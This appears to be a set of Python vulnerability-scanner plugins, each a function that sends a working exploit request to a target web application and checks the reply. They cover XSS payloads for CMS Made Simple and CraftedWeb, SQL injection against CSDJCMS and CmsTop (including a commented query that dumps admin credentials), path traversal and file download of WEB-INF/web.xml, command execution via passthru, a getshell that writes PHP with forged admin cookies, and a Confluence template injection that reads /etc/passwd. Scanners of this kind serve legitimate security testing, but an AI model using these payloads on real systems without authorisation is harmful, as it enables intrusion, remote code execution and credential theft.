def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml" payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('cscanhyhm2n') != -1 : Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml" payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cscanhyhm2n') != -1: Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/k/cms/cmsmadesimple/install/index.php" data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US''' payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data,headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>''') != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/siteprefs.php" data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search''' payload_url = scheme + "://" + url +":"+ str(port) + payload resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/lib/filemanager/imagemanager/images.php?deld=../../" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('404') == -1 and con.find( 'Not Found') == -1 and con.find('未找到') == -1: Medusa = "{}存在CMSMS目录遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD) payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 : Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23" # 爆用户密码用 # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \ # %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\ # 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\ # 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23" payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url,headers=headers, timeout=6, verify=False) con = resp.text if con.find("'904c23abadd5a4648a973c86385f3930'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml" payload_url = scheme + "//" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('xml version') != -1: Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4" data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1" payload_url = scheme + "://" + url +":"+ str(port) + payload Headers["Accept"]="*/*" Headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8" Headers["X-Requested-With"]="XMLHttpRequest" Headers["Content-Length"]="115" Headers["Connection"]="close" Headers["Pragma"]="no-cache" Headers["Cache-Control"]="no-cache" resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('''{"response":"Success","details":"}''') != -1 : Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ":" + str(port) referer = scheme + "://" + url headers = { "Host": "{}".format(url), "User-Agent": RandomAgent, "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer), "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "169" } data = "name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E" s = requests.session() resp = s.post(payload_url,data=data,headers=headers, timeout=6, verify=False) con = resp.text if con.find('PHP Version') != -1 and con.find('System'): Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cacti.sql" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cacti.sql') != -1: Medusa = "{}存在CactiSQL数据库文件泄露漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('cscan')>" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('<script>alert(cscan)</script>') != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/siteprefs.php" data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search''' payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/open/bang" payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul" s = requests.session() resp = s.post(payload_url,headers=headers, data=data, timeout=6, verify=False) con = resp.text if con.find("for key 'group_key'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text if con.find("63e1f04640e83605c1d177544a5a0488") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cscanhyhm2n') != -1: Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.Low() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml" payload_url = scheme + "//" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('log4jConfigLocation') != -1 : Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}''' data2 = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"id"},"body":""}}''' Payload = "/rest/tinymce/1/macro/preview" PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload Referers = scheme + "://" + url + ':' + str(port) headers = { 'Accept': 'text/plain, */*; q=0.01', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'User-Agent': RandomAgent, 'X-Requested-With': 'XMLHttpRequest', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/json; charset=utf-8', 'Referer': Referers, 'Connection': 'keep-alive' } try: resp = requests.post(PayloadUrl, data=data, proxies=proxies, headers=headers, timeout=5) resp2 = requests.post(PayloadUrl, data=data2, proxies=proxies, headers=headers, timeout=5) con = resp.text con2 = resp2.text code = resp.status_code code2 = resp2.status_code if (code == 200 and con.lower().find('bin') != -1 and con.lower().find('root') != -1) or ( code2 == 200 and con2.lower().find('uid=') != -1 and con2.lower().find('gid=') != -1): Medusa = "{}存在AtlassianConfluence路径穿越与命令执行漏洞 \r\n漏洞详情:\r\nPOST:{}\r\n返回内容:{}\r\n".format( url, data2, data, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
